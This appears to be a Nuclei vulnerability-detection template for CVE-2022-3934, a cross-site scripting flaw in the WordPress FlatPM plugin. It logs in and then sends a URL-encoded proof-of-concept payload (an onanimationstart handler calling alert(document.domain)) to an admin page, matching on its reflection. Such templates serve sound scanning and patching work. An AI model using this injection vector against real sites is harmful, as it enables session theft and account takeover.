id: CVE-2022-3934

info:
  name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 3.0.13.
  reference:
    - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3934
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-3934
    cwe-id: CWE-79
    epss-score: 0.00092
    epss-percentile: 0.37956
    cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mehanoid
    product: flat_pm
    framework: wordpress
  tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
        condition: and
# digest: 4a0a00473045022055fba672dad146e93dacb3d50e8711c24f62824a1537c6528e556035e547b531022100c5aff9e112c142313578fb3dfb3657b394dd081730b12452893b6e84b0fa8007:922c64590222798bb761d5b6d8e72950